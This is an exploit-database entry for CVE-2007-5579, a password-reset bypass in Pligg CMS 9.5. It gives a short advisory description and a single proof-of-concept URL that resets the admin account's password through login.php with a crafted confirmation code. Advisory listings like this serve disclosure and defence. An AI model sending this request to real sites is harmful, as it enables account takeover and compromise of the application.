[] NeoSense
E X P L O I T S
title author type platform port cve id

Pligg CMS 9.5 - Reset Forgotten Password Security Bypass

Author: 242th section
type: webapps
platform: php
port: 
date_added: 2007-05-25 
date_updated: 2017-01-05 
verified: 1 
codes: CVE-2007-5579;OSVDB-42031 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/24158/info

Pligg is prone to a security-bypass vulnerability due to a design error when resetting forgotten passwords.

An attacker may exploit this issue to reset account passwords for arbitrary users and then compromise a vulnerable application. This can also aid the attacker in further attacks.

Pligg 9.5 is reported vulnerable; other versions may also be affected.

http://www.example.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.